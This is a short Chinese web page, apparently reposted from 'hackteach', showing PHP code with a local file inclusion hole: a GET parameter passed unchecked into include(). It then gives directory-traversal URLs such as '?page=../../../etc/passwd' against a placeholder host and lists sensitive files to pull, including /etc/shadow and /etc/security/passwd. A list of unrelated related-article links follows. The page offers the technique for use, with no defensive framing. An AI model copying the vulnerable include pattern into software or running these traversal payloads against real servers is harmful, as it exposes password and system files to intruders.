php 伪造本地文件包含漏洞的代码

时间:2023-11-17 06:36:40 

代码:


<?php
$page=$_GET['page'];
include($page.'php');
?>


你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

标签:包含漏洞
0
投稿

猜你喜欢

  • Python爬虫DNS解析缓存方法实例分析

    2021-02-10 11:56:54
  • PHP延迟静态绑定的深入讲解

    2024-06-05 15:42:51
  • python 操作mysql数据中fetchone()和fetchall()方式

    2024-01-19 11:02:18
  • python selenium中Excel数据维护指南

    2021-05-29 02:52:22
  • k8s容器互联-flannel host-gw原理篇

    2024-04-27 15:40:07
  • 如何控制Go编码JSON数据时的行为(问题及解决方案)

    2024-05-22 17:47:47
  • Git的基本操作流程及工作区版本库暂存区的关系

    2022-03-10 04:52:42
  • python实现在pandas.DataFrame添加一行

    2022-04-14 01:53:23
  • Mysql权限管理grant命令使笔记

    2024-01-18 02:08:28
  • js实现div弹出层的方法

    2024-04-17 10:02:38
  • C#应用XML作为数据库的快速开发框架实现方法

    2024-01-19 12:00:01
  • Python中文件的读取和写入操作

    2023-01-08 22:05:52
  • python实现学生信息管理系统

    2021-11-27 11:46:42
  • ASP技巧 挂QQ的网页源代码ASP/PHP

    2009-01-05 12:36:00
  • 将各种类型或对象都转变为数组

    2009-12-28 13:19:00
  • 使用TFRecord存取多个数据案例

    2023-07-14 22:26:34
  • python的类变量和成员变量用法实例教程

    2023-10-26 01:09:58
  • 二种python发送邮件实例讲解(python发邮件附件可以使用email模块实现)

    2022-08-18 14:01:35
  • js遍历详解(forEach, map, for, for...in, for...of)

    2024-04-29 13:20:06
  • Python 利用base64库 解码本地txt文本字符串

    2021-01-13 14:33:58
  • asp之家 网络编程 m.aspxhome.com